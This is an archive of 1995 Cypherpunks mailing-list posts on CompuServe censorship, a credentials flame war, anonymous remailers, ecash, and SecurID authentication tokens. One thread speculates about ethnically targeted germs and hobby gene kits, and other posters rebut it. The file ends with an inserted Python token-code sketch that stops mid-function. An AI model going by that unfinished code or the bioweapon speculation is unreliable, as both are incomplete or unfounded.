forum. ...[etc.]
...................................................................................................


Aside from the obvious implications to liberty,  of the backing down from standing up (!) to the demand for self-censorship, I was thinking about other possible developments:

Since, as 'Dr. Dimitri' mentions, CompuServe offers some info which is not available from other sources - and this info is often quite useful/valuable to business enterprises, such that they and other individuals would not be too keen on abandoning these immediately just for the principle of the thing - it could develop that those who are willing and can afford it, will end up "supporting", or getting services from, different providers based on the particular services which they offer.

This could represent a partial solution (in my mind, at least, not being inclined toward blanket censorship of all things discomfiting to my sensibilities) to the matter of there being free-radical electrons "out there" existing in the form & shape of various degrees of sexual permutations:

.  Those concerned that their children may innocently surf over to alt.binaries.naughty.nude.x-rated.pictures and see alarming truths about adult behavior, and don't want to purchase the available filtering software, could subscribe to CompuServe and rest assured that their children would only have access to safe, industrial-strength info on that account.

.  Those wishing to discuss their sexually-related personal problems, or who are pleased to just look at/talk about sex et al,  could continue to do so through their subscription to the adult bbs-es or local ISPs providing uncensored access to all newsgroups.

It could develop that large companies providing internet access will seek to distinguish/identify themselves (as they are tending to do already) between the pablum-feeding family-types like AOL, or corporate/business-types like CompuServe, or free-for-alls like local ISPs.   Such developments of course would depend on a tolerance for the existence of those un-specialized carriers which aren't averse to transmitting controversial, "sensitive" content.

These divisions among services might still not be acceptable to States and Nations & other 'busybodies', but the resistance to such developments would only serve to more explicitly define the problem;  it could make prominent the real issue of people's attitudes, fears, and expectations concerning sex & human nature, and of the obstacles in the way of achieving personal responsibility regarding these (among other things).

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 31 Dec 1995 12:35:29 +0800
To: herbs@connobj.com (Herb Sutter)
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <2.2.32.19951231025816.0074caa0@mail.interlog.com>
Message-ID: <199512310246.VAA00949@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> I am neither attacking nor defending Fred Cohen; I don't know him from Adam,
> and haven't read his messages or his book.  But since you asked for where
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

You should. They're hysterical. The man hasn't a clue to his name.           

> you can find Cohen's published work, there's one answer (assuming it's the
> same Fred Cohen).

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonnyx <jonnyx@edge.edge.net>
Date: Sun, 31 Dec 1995 12:23:34 +0800
To: cypherpunks@toad.com
Subject: (NOISE) Re: PLA_gue  Germ Terrorism
In-Reply-To: <199512301830.NAA05708@pipe4.nyc.pipeline.com>
Message-ID: <199512310354.VAA02877@edge.edge.net>
MIME-Version: 1.0
Content-Type: text/plain


In a recent message, John Young babbled:

>    12-30-95. To update the list of terrorist threats, the Wash
>    Post reports on the purchase in May of bubonic plague germs 
>    by "white supremacist" Larry Wayne Harris, his bust by the 
>    FBI and germ teams, prosecutors amazement that possession 
>    of such deadly micro-organisms is not illegal, and the 
>    consequent plea bargain of wire fraud with probation.

< snip >

Think that's fun? How 'bout this: given that the initial "mapping"
phase of the human genome project is nearly complete, and the huge
amount of genetic information available on the net, PLUS ever-
more-powerful-yet-less-costly computers anyone can purchase, just
how long do y'all think it'll be before some nut whips up a bug
that targets, say, people with negroid genetic characteristics?
Or epicanthic folds? Or blonde hair?

Seem kinda far-fetched? The November NUTS & VOLTS has a nifty 
six page article on garage genetic experimentation (how to convert
that old aquarium into an incubator, culturing techniques, etc.).
They even list sources for equipment AND GERMS. Yes folks, you can
order your very own "E-Z Gene Splicer DNA Recombination and
Transformation Kit" from the good folks at Images Company, POBox
140742, Staten Island NY 10314, (718) 698-8305, $49.95 each,
not recommended for children under 6 (too many parents complaining
about mutated family cats).

Quote from the article: "A word of caution is in order before we
start. Although the materials in the kit are safe, it is important 
for you to follow simple procedures to keep the experiment controlled
and nonthreatening." No shit. E-coli bacteria (what the kit uses)
aren't pathogens, but still... I guess every budding young white
supremacist/right-wing religious nut/genocidal maniac has to start
somewhere. 
 
Pleasant dreams.
-- 
 
|| ______    || comments, criticisms, and/or death-threats may be sent to: ||
|| \__  /\   ||            jonny anonymous, c/o jonnyx@edge.net            ||
|| __/ /  \  ||  or snail-mail pobox 23001, nashvegas tn 37202-3001, usa   ||
|| \__/_/\_\ ||______"DRIVING DRUNK ON THE INFORMATION SUPERHIGHWAY!"______||

ps - Hey! I violated the new copyright laws with my quote AND I wrote a
     dirty word that 10 year olds might read! Cool! Wonder how else this
     message can get me in trouble?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@connobj.com>
Date: Sun, 31 Dec 1995 11:24:24 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Is Dr Fred Cohen a Loon???
Message-ID: <2.2.32.19951231025816.0074caa0@mail.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 19:55 12.30.1995 -0600, Ed Carp [khijol SysAdmin] wrote:
>I am as unenvious of Mr. Cohen as I am of Bruce Schneier - and Bruce has a
>lot more of my respect.  Just because someone writes a "very innovative
>thesis" on viruses doesn't mean they know diddly about anything else,
>especially cryptography.  Where is Fred's paper?  I've got Bruce's book on
>my shelf that I can read for myself and *that's* a classic in the field. 

In that case, look at the last two pages in "Applied Crypto - 2nd ed", where
Wiley puts ads for related books.  You'll find:

- "E-Mail Security", also by Bruce Schneier
- "Protection and Security on the Information Superhighway", by Frederick B.
Cohen
- "Digital Money", by Daniel Lynch and Leslie Lundquist

I am neither attacking nor defending Fred Cohen; I don't know him from Adam,
and haven't read his messages or his book.  But since you asked for where
you can find Cohen's published work, there's one answer (assuming it's the
same Fred Cohen).

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter (herbs@connobj.com)

Connected Object Solutions     2228 Urwin - Suite 102     voice 416-618-0184
http://www.connobj.com/      Oakville ON Canada L6L 2T2     fax 905-847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Sun, 31 Dec 1995 14:38:48 +0800
To: jonnyx <jonnyx@edge.edge.net>
Subject: Re: (NOISE) Re: PLA_gue Germ Terrorism
In-Reply-To: <199512310354.VAA02877@edge.edge.net>
Message-ID: <Pine.LNX.3.91.951230214617.9080B-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 30 Dec 1995, jonnyx wrote:

> Date: Sat, 30 Dec 1995 21:54:15 -0600 (CST)
> From: jonnyx <jonnyx@edge.edge.net>
> To: cypherpunks@toad.com
> Subject: (NOISE) Re: PLA_gue Germ Terrorism
> 
> In a recent message, John Young babbled:
> 
< GIANT snip >

am i troll-bait or what?
 
> Think that's fun? How 'bout this: given that the initial "mapping"
> phase of the human genome project is nearly complete, and the huge
> amount of genetic information available on the net, PLUS ever-
> more-powerful-yet-less-costly computers anyone can purchase, just
> how long do y'all think it'll be before some nut whips up a bug
> that targets, say, people with negroid genetic characteristics?
> Or epicanthic folds? Or blonde hair?

this is so much shit.  targetting anything is very difficult.  just ask 
all those people about the wonders of gene therapy.  hell, even the 
economist had an article about it's failures recently (Dec 16-22 1995, 
p77).

in any event the so-called 'differences' you are imagining are
phenotypes.  these are a long cry from DNA.  i'm not aware of any
genetic markers available to distinguish a black man from a white
man. and, even if there were, recombination requires long
stretches of homology between DNAs, not small differences.  i'd bet
it's nearly impossible to target black vs white vs yellow vs a
gorilla.
 
> Seem kinda far-fetched? The November NUTS & VOLTS has a nifty 

yes.

- -pjf

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Sun, 31 Dec 1995 16:09:35 +0800
To: amp <C.deGroot@inter.nl.net>
Subject: Re: Australian "calculatorcard"
Message-ID: <199512310627.WAA11299@scruz.net>
MIME-Version: 1.0
Content-Type: text/plain


>sounds like the card i use for remote dialup to certain non-public
>systems i use at work. it has a six digit number on the front that
>changes every 60 seconds. the card is registered to me. when i enter
>my username/password i'm prompted for the number. it's Pretty Good
>(tm) security, but like anything not biometric, it is vulnerable to
>black-bag attacks. physical possession being all that is required. if
>you know the algorithm and the serial number of the card and the
>time, even that isn't necessary.
>
>
>CG> Can anybody provide me with pointers to more in-depth information
>CG> about this device and the algorithm(s) behind it ?
>
>i don't know if there are any net sources for them, but i'd be
>surprised if not. my card references "security dynamics" of cambridge
>massachusetts.

You are referring to the ACE/SecurID token card from Security Dynamics.

In addition to the displayed number, you should be prepending it with a
memorized PIN; this prevents operation in case of theft.  The server end
will disable the card after x failed attempts, etc.  Otherwise it is
basically a one-time password system.

I've had a business relationship with these folks for a year or so now--
sharp guys.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "R. J. Harvey" <harveyrj@vt.edu>
Date: Sun, 31 Dec 1995 12:33:34 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Is Dr Fred Cohen a Loon???
Message-ID: <199512310359.WAA23216@quackerjack.cc.vt.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 08:15 PM 12/30/95 EST, you wrote:
>
>In my experience, people who get so hysterical when a Ph.D. calls himself or
>herself Dr. are invariably Ph.D. dropouts who wasted many years of their lives
>trying and failing to attain a Ph.D. and are bitterly envious of those who have
>succeeded.
>
   Well, my experience is exactly the opposite: the
ones who have to brandish the "Ph.D." label are the
ones who were the least secure in their abilities,
and the ones who seem least deserving of having ever
graduated.  Often the same folks who feel compelled
to put "Dr." in their 'from' lines.  
   This is from one of the numerous people on this
list who have Ph.D.s and who don't wear them on
their sleeves (and who only "wasted" 3 years of his
life in getting one)...

rj







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Sun, 31 Dec 1995 14:52:33 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <8iiygD48w165w@bwalk.dm.com>
Message-ID: <199512310509.XAA24032@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net> writes:
> [yet another very long flame directed at Dr. Fred Cohen]

Well, it wasn't directed specifically at Fred...

> > Just remember - PhD means 'piled higher and deeper'.

> > Finger ecarp@netcom.com for PGP 2.5 public key   an88744@anon.penet.fi

> I wonder why you put your anon.penet.fi address in your signature.
> There may be a perfectly reasonable explanation that I didn't think of :)

Well, yes, there is. :)  It's so that folks may correspond with me 
anonymously if they wish to do so.  Some people don't want me knowing who 
they are....
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Dec 1995 13:54:18 +0800
To: cypherpunks@toad.com
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <199512310155.TAA12831@dal1820.computek.net>
Message-ID: <8iiygD48w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net> writes:
[yet another very long flame directed at Dr. Fred Cohen]
> Just remember - PhD means 'piled higher and deeper'.
> - --
> Ed Carp, N7EKG                  Ed.Carp@linux.org, ecarp@netcom.com
>                                 214/993-3935 voicemail/digital pager
>                                 800/558-3408 SkyPager
> Finger ecarp@netcom.com for PGP 2.5 public key   an88744@anon.penet.fi
                                                   ^^^^^^^^^^^^^^^^^^^^^
I wonder why you put your anon.penet.fi address in your signature.
There may be a perfectly reasonable explanation that I didn't think of :)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Sun, 31 Dec 1995 15:33:17 +0800
To: cypherpunks@toad.com
Subject: Compuserve and copyrights
Message-ID: <199512310542.XAA25896@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

I have sent Compuserve a notice that all posts originating from this site 
are copyrighted and barred from being stored on a site that does not 
allow reciprocal access.  I would urge that other sites consider sending 
a similar notice to Compuserve.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Sun, 31 Dec 1995 13:40:40 +0800
To: Cees de Groot <C.deGroot@inter.nl.net>
Subject: Re: Australian "calculatorcard"
Message-ID: <01HZFQH4O0R695OXTW@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

From: Cees de Groot            \ Internet:    (cg@bofh.toad.com)
To:   cypherpunks              \ Internet:    (cypherpunks@toad.com)

Subject: Australian "calculatorcard"

Hi everybody,

CG> Yesterday, on UK Discovery, there was an item in the programme
CG> Beyond 2000 about an Australian card which implements a
CG> challenge-response protocol and can be used for banking, etcetera.
CG> Basically, you give your card number (over the phone), get a
CG> challenge number, enter your pin and the challenge, and then give the
CG> response. All in CC format...

sounds like the card i use for remote dialup to certain non-public
systems i use at work. it has a six digit number on the front that
changes every 60 seconds. the card is registered to me. when i enter
my username/password i'm prompted for the number. it's Pretty Good
(tm) security, but like anything not biometric, it is vulnerable to
black-bag attacks. physical possession being all that is required. if
you know the algorithm and the serial number of the card and the
time, even that isn't necessary.


CG> Can anybody provide me with pointers to more in-depth information
CG> about this device and the algorithm(s) behind it ?

i don't know if there are any net sources for them, but i'd be
surprised if not. my card references "security dynamics" of cambridge
massachusetts.

amp
<0003701548@mcimail.com> (since 10/31/88)
<alan.pugh@internetmci.com>
PGP Key = 57957C9D
PGP FP = FA 02 84 7D 82 57 78 E4  E2 1C 7B 88 62 A6 F9 F7 
December 30, 1995   23:29

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@boston.CS.Berkeley.EDU (David A Wagner)
Date: Sun, 31 Dec 1995 14:45:36 +0800
To: cypherpunks@toad.com
Subject: Re: [ecash] Re: Multi-issuer questions
Message-ID: <199512310504.AAA18856@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have to admit I don't know the ecash concepts well enough to respond
very intelligently to everything you talked about, though I'd like to
address one of your comments on inter-bank clearing.

I wanted to bring up one misconception: you mention that the main worth
of ecash is measured by whether merchants will accept it as payment,
and that whether a bank will accept it as a deposit is just a secondary
issue.  From this you conclude that so long as a merchant can validate
ecash (via online clearing, to detect double-spending), it doesn't really
matter whether that merchant's bank will accept the ecash -- just that
other merchants will accept the ecash.  This is brought up in the context
of "what if Bank B didn't accept [deposits of] ecash from Bank A?".

I claim that this is at best misleading, because with Digicash's ecash,
when a merchant receives ecash as payment, the ecash is "made out" to
that particular merchant, and is non-transferable-- i.e. can't be
used as payment to another merchant.  When you've been paid Digicash
ecash, about the only interesting thing you can do is deposit it with
your bank.

[ For simplicity, I'm ignoring wildcards in the "pay to" field; but
wildcards are insecure on their own.  Digicash hasn't really attempted
to support wildcards or transferable ecash in general, as far as I
can tell.  Correct me if I'm wrong. ]
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMOYZwCoZzwIn1bdtAQFvaQGA1f4oy6Z2TF9810fIUEqkktpQN01FPUCb
ER/q3WI/kuyjQCBJh/laA0QsU2q8jnP4
=8Mib
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Dec 1995 15:23:21 +0800
To: cypherpunks@toad.com
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <199512310509.XAA24032@dal1820.computek.net>
Message-ID: <gFkygD49w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net> writes:
> > I wonder why you put your anon.penet.fi address in your signature.
> > There may be a perfectly reasonable explanation that I didn't think of :)
>
> Well, yes, there is. :)  It's so that folks may correspond with me
> anonymously if they wish to do so.  Some people don't want me knowing who
> they are....

This is fascinating! Could you please explain (for the benefit of clueless
Ph.D.'s like myself) how putting your anon id in your signature enables folks
to send you anonymous e-mail, who couldn't do that before by e-mailing
anon@anon.penet.fi and adding:

X-Anon-To: erc@dal1820.computek.net

(E-mailing erc%dal1820.computek.net@anon.penet.fi might work too.)

I do see how it stops you from being anonymous when you post via that
particular anon.penet.fi address, but that's a different issue.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 31 Dec 1995 16:15:55 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <gFkygD49w165w@bwalk.dm.com>
Message-ID: <199512310524.AAA01241@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net> writes:
> > > I wonder why you put your anon.penet.fi address in your signature.
> > > There may be a perfectly reasonable explanation that I didn't think of :)
> >
> > Well, yes, there is. :)  It's so that folks may correspond with me
> > anonymously if they wish to do so.  Some people don't want me knowing who
> > they are....
>
> This is fascinating! Could you please explain (for the benefit of
> clueless Ph.D.'s like myself) how putting your anon id in your
> signature enables folks to send you anonymous e-mail, who couldn't
> do that before by e-mailing anon@anon.penet.fi and adding:
>
> X-Anon-To: erc@dal1820.computek.net
>
> I do see how it stops you from
> being anonymous when you post via that particular anon.penet.fi
> address, but that's a different issue.

Gee.. you would think a high and mighty Ph.D like yourself could do a
little better than petty bickering.

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 31 Dec 1995 16:20:49 +0800
To: jonnyx@edge.edge.net (jonnyx)
Subject: Re: (NOISE) Re: PLA_gue  Germ Terrorism
In-Reply-To: <199512310354.VAA02877@edge.edge.net>
Message-ID: <199512310701.BAA01450@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



> Think that's fun? How 'bout this: given that the initial "mapping"
> phase of the human genome project is nearly complete, and the huge
> amount of genetic information available on the net, PLUS ever-
> more-powerful-yet-less-costly computers anyone can purchase, just
> how long do y'all think it'll be before some nut whips up a bug
> that targets, say, people with negroid genetic characteristics?
> Or epicanthic folds? Or blonde hair?
> 

Malarky.

> Seem kinda far-fetched? The November NUTS & VOLTS has a nifty 
> six page article on garage genetic experimentation (how to convert
> that old aquarium into an incubator, culturing techniques, etc.).
> They even list sources for equipment AND GERMS. Yes folks, you can
> order your very own "E-Z Gene Splicer DNA Recombination and
> Transformation Kit" from the good folks at Images Company, POBox
> 140742, Staten Island NY 10314, (718) 698-8305, $49.95 each,
> not recommended for children under 6 (too many parents complaining
> about mutated family cats).
> 

While it is quite possible to obtain equipment and supplies from any
reputable science supply center (I like Brodehead-Garrett & Cenco myself) it
is not cheap. The type of equipment that can be made out of aquaria and such
is very low-level and poses little threat *provided* isolation procedures
are taken. The types of 'genetic' experiments that can be done at this level
are quite simple and generally explore characteristics that are based on the
crossing models of Mendelson. Most of the threat of this type of experiments
are from simple infections since viruses are not easily raised with this
form of equipment.

One of my favorite 'technology rulers' is when the first strain of common
yeast is released which produces THC or LSD. Both of these chemicals are
relatively simple to produce at a cellular level and Marijuana was
completely mapped just a couple of years ago. Yeast has been mapped for
several years and there is a whole technology of protocols based around
using it (or E. Coli) for laboratory experiments into secondary and tertiary
production systems in cells. The reason that I use Marijuana or LSD as a
test is that neither are the result of direct protein synthesis. They are
rather produced as a result of cellular metabolism of primary components.
Both of these require garage level control and access to only the most basic
tools and sequencers. To do this successfully will require somebody to take
the necessary genomes out of the chromosomes and then using a virus and
suitable cutting agents insert them in the yeast. I do not believe we will
see this in the near term using the micro-manipulator systems which do
direct injection of genetic material because of the cost and utility
requirements of such equipment.

> Quote from the article: "A word of caution is in order before we
> start. Although the materials in the kit are safe, it is important 
> for you to follow simple procedures to keep the experiment controlled
> and nonthreatening." No shit. E-coli bacteria (what the kit uses)
> aren't pathogens, but still... I guess every budding young white
> supremacist/right-wing religious nut/genocidal maniac has to start
> somewhere. 
>  

E. Coli can be quite toxic. The people who died last year because of the bad
burger at the Jack In The Box died from E. Coli. There are hundreds of
strains of Escherichia Coli and not all of them are benign.

There is also a long history of this type of experimentation, it is not new.
Scientific American put out a book in the late 50's and early 60's that had
a whole slew of 'Amateur Scientist' articles compiled and several of them
related to this technology.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 31 Dec 1995 18:14:03 +0800
To: jya@pipeline.com
Subject: Re: PLA_gue  Germ Terrorism
Message-ID: <01HZFUC4ZW4W8Y56CR@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: John Young <jya@pipeline.com>

>  12-30-95. To update the list of terrorist threats, the Wash
   Post reports on the purchase in May of bubonic plague germs 
   by "white supremacist" Larry Wayne Harris, his bust by the 
   FBI and germ teams, prosecutors amazement that possession 
   of such deadly micro-organisms is not illegal, and the 
   consequent plea bargain of wire fraud with probation.

   The article explains that possession of "terrorist" mites
   is not prohibited due to a legal loophole which allows
   scientific trade in wee supremacists. There are calls for 
   outlawing the meat-eaters by closing the gap in the 
   anti-terrorism bill before Congress. But scientists say 
   how dare you spit in our nanodeath soup.

   It notes that offshore spread is Commerce regulated.
-------------
	There are very good reasons for keeping this legal loophole. How could
one ship, say, Ebola virus for evaluation if it wasn't there? Besides which,
E. Coli (the workhorse of prokaryotic genetics) can be a pathogen if the
right plasmid is inserted. Banning shipment, buying, etcetera of strains of it
would rapidly reduce most genetics work in the U.S. to the state of gene
therapy work in Switzerland (i.e., none, due to the Swiss laws outlawing any
form of it).
	Incidentally, thanks to the person who quashed the "black-seeking
virus" idiot. Human races are so far from being proper genetically distinct
subspecies that nobody competent would call them that, if they only weren't us.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Sun, 31 Dec 1995 17:35:43 +0800
To: cypherpunks@toad.com
Subject: Re: Australian "calculatorcard"
Message-ID: <v02130502ad0be4ca497f@[198.115.179.213]>
MIME-Version: 1.0
Content-Type: text/plain


Cees de Groot (cg@bofh.toad.com) tore himself from the tube to tell us:

CG> Yesterday, on UK Discovery, there was an item in the programme
CG> Beyond 2000 about an Australian card which implements a
CG> challenge-response protocol and can be used for banking, etcetera.
CG> Basically, you give your card number (over the phone), get a
CG> challenge number, enter your pin and the challenge, and then give the
CG> response. All in CC format...

        Could be one of seven or 8 vendors of so-called
"challenge/response" tokens or calculators.  Most of those sold in the US
and Australia use straight DES (and a token-specific key) to encrypt the
"random" challenge number in the token -- but it could be any secret-key
algorithm.

        Actually, the particular environment described -- phone
authentication -- is often used as the most notable example of a market
where so-called "time-synchronous" tokens hold a notable advantage over
challenge/response token. A TS token generates its pseudo-random
token-codes continuously and automatically: no buttons, no input.

        With TS tokens, exact time and a token-specific key are used in a
keyed hash to generate a token-code displayed on an LCD on the token for 30
or 60 seconds.   The authentication server uses its database record of the
token-specific key, time, and the hash to generate the same token-code for
a match.  This allows a PIN and token-code two-factor authentication to be
submitted by touch-tone phone, and it avoids a lot of the hassle
(listen/tap/calculate/touch-tone) associated with C/R authentication.

        As amp <Alan.Pugh@internetMCI.COM> noted, the most prominent
international vendor of time-synch tokens is a US firm called Security
Dynamics, Inc.  I've done consulting projects for SDI, off and on, for
years.

>sounds like the card i use for remote dialup to certain non-public
>systems i use at work. it has a six digit number on the front that
>changes every 60 seconds. the card is registered to me. when i enter
>my username/password i'm prompted for the number.

        SDI's token is called a SecurID. <http://www.securid.com>  SDI uses
a <sigh> proprietary hash.  The most common app uses a SecurID in a
protocol which prepends the PIN, in the clear, to the PRN token-code. (In
client/server environments, of course, all communication between an SDI
ACE/Client and the ACE/Server is fully encrypted.)  SecurIDs can also be
loaded with up to three different seeds or keys -- with a pressure-point in
one corner to switch between each series of key-based PRNs.

        For greater security in open networks, SDI sells a PinPad token
with a keypad that allows a PIN to be "added" to the PRN token-code -- so
the LCD displays a 6-8 digit number (or alphanumeric) which still offers
two-factor authentication, without exposing a PIN.

> it's Pretty Good
>(tm) security, but like anything not biometric, it is vulnerable to
>black-bag attacks. physical possession being all that is required.

        Actually, all ACE/Server or ACE software modules _require_ a
user-memorized PIN.  Physical possession of a stolen token is not enough to
gain illicit access.

>if
>you know the algorithm and the serial number of the card and the
>time, even that isn't necessary.

        Bleep!  Earth to amp! Check your voltage, lately?  The token's
serial number has nothing whatsoever to do with the generation of a
SecurID's PRN token-code.

        Just because SDI ships its SecurIDs pre-loaded (most token vendors
ask the buyers to program their authentication tokens) SDI embosses a
serial number on the back of the token to manage shipping and distribution.
The serial number is stuck to the back of a SecurID after it is programmed
with its secret key -- a unique PRN "significantly longer" than 56 bits --
but they are not the same thing.  The cpu in a SecurID doesn't even "know"
the serial number stuck on the back of the token.

        (It would be Pretty Stupid <TM> to glue or emboss a secret on the
back of the damn token, wouldn't it?)  I should note that Alan is just
regurgitating one of the most widely circulated rumors about SecurIDs --
which like any popular crypto device attracts a lot of wiLd & w00ly
speculation.

        Getting the algorithm for SDI's one-way hash is no big deal, given
that it sits in software in thousands of SDI customer installations,
protected only by contract and trade secret status.  (The integrity of the
product -- the unpredictability of the token-code PRN series, and the
secrecy of a specific token's seed or key -- rightly depends on the cryptographic
strength of the hash, not the secrecy of the algorithm.)  Getting a
token-specific secret key would hopefully be a much greater challenge.

CG> Can anybody provide me with pointers to more in-depth information
CG> about this device and the algorithm(s) behind it ?

>i don't know if there are any net sources for them, but i'd be
>surprised if not. my card references "security dynamics" of cambridge
>massachusetts.


        Suerte & Happy New Year to all,
                                                                 _Vin

<*><*>< Vin McLellan + The Privacy Guild + vin@shore.net ><*><**>

Heed, fellow citizens, Justice Felix Frankfurter (Butler v. Michigan):

       "The State insists that, by thus quarantining the general reading public
against books not too rugged for grown men and women in order to shield
juvenile innocence, it is exercising its power to promote the general
welfare. Surely this is to burn the house to roast the pig.... The incidence
of this enactment is to reduce the adult population of Michigan to reading
only what is fit for children."
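
The time-synchronous scheme described in the two SecurID posts above (token-specific key plus time fed to a keyed hash, memorized PIN prepended, card disabled after repeated failures), as an added example that is not part of either original post and is not SDI's code. SDI's hash is proprietary, so HMAC-SHA-256 with RFC 4226-style truncation stands in for it; the seed, PIN, user name, drift window and lockout threshold are constructed assumptions.

```python
import hashlib
import hmac
import struct

STEP_SECONDS = 60   # display interval; the post mentions 30 or 60 seconds
CODE_DIGITS = 6     # six-digit token-code, as on the card described
MAX_FAILURES = 3    # constructed stand-in for the "x failed attempts" lockout
SEED = bytes.fromhex("3b1f9c4e7a2d58600f94c1d2e6a7b813")  # constructed 128-bit token key


def token_code(seed: bytes, unix_time: int) -> str:
    """Token-code shown during the time step that contains unix_time.

    Inputs are only the secret seed and the clock; no serial number is involved.
    HMAC-SHA-256 is a stand-in for the vendor's proprietary keyed hash.
    """
    step = struct.pack(">Q", unix_time // STEP_SECONDS)
    digest = hmac.new(seed, step, hashlib.sha256).digest()
    offset = digest[-1] & 0x0F                      # RFC 4226-style truncation
    value = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
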